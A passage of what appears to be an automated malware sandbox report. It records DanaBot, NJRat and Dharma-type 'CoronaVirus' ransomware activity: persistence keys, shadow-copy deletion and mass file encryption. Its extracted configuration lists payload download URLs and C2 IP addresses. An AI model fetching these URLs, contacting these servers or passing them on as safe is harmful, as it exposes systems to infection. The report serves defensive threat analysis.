Analysis
-
max time kernel
446s -
max time network
480s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
24-03-2024 21:30
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
http://blockchainjoblist.com/wp-admin/014080/
https://womenempowermentpakistan.com/wp-admin/paba5q52/
https://atnimanvilla.com/wp-content/073735/
https://yeuquynhnhai.com/upload/41830/
https://deepikarai.com/js/4bzs6/
Extracted
danabot
51.178.195.151
51.222.39.81
149.255.35.125
38.68.50.179
51.77.7.204
Signatures
-
Danabot x86 payload 2 IoCs
Detection of Danabot x86 payload, mapped in memory during the execution of its loader.
Processes:
resource yara_rule C:\Users\Admin\DOWNLO~1\DanaBot.dll family_danabot C:\Users\Admin\Downloads\DanaBot.dll family_danabot -
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3440 5572 powershell.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (501) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 12 IoCs
Processes:
rundll32.exepowershell.exeflow pid process 184 1056 rundll32.exe 193 3440 powershell.exe 197 3440 powershell.exe 205 1056 rundll32.exe 213 1056 rundll32.exe 217 1056 rundll32.exe 224 1056 rundll32.exe 237 1056 rundll32.exe 252 1056 rundll32.exe 262 1056 rundll32.exe 263 1056 rundll32.exe 270 1056 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 5656 netsh.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
msedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exeCoronaVirus.exemsedge.exemsedge.exemsedge.exemsedge.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation CoronaVirus.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation msedge.exe -
Drops startup file 9 IoCs
Processes:
CoronaVirus.exeNJRat.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe NJRat.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:SmartScreen:$DATA NJRat.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe NJRat.exe -
Executes dropped EXE 17 IoCs
Processes:
DanaBot.exeNJRat.exeNJRat.exeCoronaVirus.exeCoronaVirus.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exeNJRat.exeCoronaVirus.exepid process 2268 DanaBot.exe 5424 NJRat.exe 5524 NJRat.exe 5684 CoronaVirus.exe 2224 CoronaVirus.exe 31240 msedge.exe 31248 msedge.exe 31444 msedge.exe 31440 msedge.exe 31704 msedge.exe 31716 msedge.exe 32208 msedge.exe 32964 msedge.exe 32976 msedge.exe 34188 msedge.exe 34364 NJRat.exe 34428 CoronaVirus.exe -
Loads dropped DLL 15 IoCs
Processes:
regsvr32.exerundll32.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exepid process 1492 regsvr32.exe 1492 regsvr32.exe 1056 rundll32.exe 1056 rundll32.exe 18336 msedge.exe 31248 msedge.exe 31240 msedge.exe 31444 msedge.exe 31440 msedge.exe 31704 msedge.exe 31716 msedge.exe 32208 msedge.exe 32964 msedge.exe 32976 msedge.exe 34188 msedge.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
NJRat.exeCoronaVirus.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .." NJRat.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe" CoronaVirus.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\"" CoronaVirus.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\"" CoronaVirus.exe Set value (str) \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .." NJRat.exe -
Drops desktop.ini file(s) 64 IoCs
Processes:
CoronaVirus.exedescription ioc process File opened for modification C:\$Recycle.Bin\S-1-5-21-3270530367-132075249-2153716227-1000\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files (x86)\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Desktop\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Downloads\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Videos\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Music\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini CoronaVirus.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3270530367-132075249-2153716227-1000\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Videos\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Documents\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Libraries\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Documents\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Music\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Pictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini CoronaVirus.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 2 IoCs
Processes:
CoronaVirus.exedescription ioc process File created C:\Windows\System32\CoronaVirus.exe CoronaVirus.exe File created C:\Windows\System32\Info.hta CoronaVirus.exe -
Drops file in Program Files directory 64 IoCs
Processes:
CoronaVirus.exedescription ioc process File created C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Trial-ul-oob.xrm-ms.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\faf_icons.png.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\StandardShader.gs.cso CoronaVirus.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\fr\UIAutomationProvider.resources.dll CoronaVirus.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_elf.dll CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\ScreenSketchSquare310x310Logo.scale-100_contrast-black.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-72_altform-unplated_contrast-white.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest2-ul-oob.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-hk_get.svg.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.2.2_2.2.27328.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64 CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.Diagnostics.StackTrace.dll.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.White@2x.png.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_Subscription-pl.xrm-ms.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\ui-strings.js CoronaVirus.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\es-ES\MSFT_PackageManagementSource.strings.psd1.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\THMBNAIL.PNG.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmiregistry.exe.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\en-us\jscripts\wefgallery_strings.js CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\RunningLate.scale-80.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-24_altform-unplated_contrast-high.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL082.XML.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2Fluent.White@3x.png CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\libvlccore.dll.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxml2.md.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\PersonaSpy.js.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\DEEPBLUE\THMBNAIL.PNG.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-ppd.xrm-ms.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudt.dll.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sv.pak.DATA.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\39.jpg CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Retail-ul-phn.xrm-ms.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OrientationControlMiddleCircle.png CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\check-mark-2x.png CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\demux\libmod_plugin.dll.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\libcanvas_plugin.dll.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\cs\WindowsFormsIntegration.resources.dll CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SmallTile.scale-125.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreAppList.scale-200.png CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_organize_18.svg.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\ui-strings.js.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\it\System.Data.Entity.Resources.dll CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Orange.xml CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_LogoSmall.targetsize-32.png CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\ui-strings.js.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\ui-strings.js.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jfr.dll.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-white\MedTile.scale-100.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019DemoR_BypassTrial180-ppd.xrm-ms.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-36_altform-unplated_contrast-high.png CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\ui-strings.js.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\ui-strings.js CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\file_info2x.png.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\resources.pri CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxGamingOverlay_2.34.28001.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_audit_report_18.svg.id-2F51CBF0.[coronavirus@qq.com].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCacheMini.scale-150.png CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\plugin.js CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\ui-strings.js CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-40_altform-unplated.png CoronaVirus.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_File_Transfer_Failed.m4a CoronaVirus.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 5648 2268 WerFault.exe DanaBot.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exeWINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 6320 vssadmin.exe 7188 vssadmin.exe -
Modifies registry class 2 IoCs
Processes:
msedge.exemsedge.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3270530367-132075249-2153716227-1000\{08EE86AE-2A58-426F-AB3F-0F735CD3CE8F} msedge.exe Key created \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings msedge.exe -
NTFS ADS 3 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 2659.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 448430.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 238417.crdownload:SmartScreen msedge.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4540 WINWORD.EXE 4540 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exepowershell.exeNJRat.exepid process 3196 msedge.exe 3196 msedge.exe 3552 msedge.exe 3552 msedge.exe 3100 identity_helper.exe 3100 identity_helper.exe 5736 msedge.exe 5736 msedge.exe 5504 msedge.exe 5504 msedge.exe 5504 msedge.exe 5504 msedge.exe 5380 msedge.exe 5380 msedge.exe 5968 msedge.exe 5968 msedge.exe 2908 msedge.exe 2908 msedge.exe 3440 powershell.exe 3440 powershell.exe 3440 powershell.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 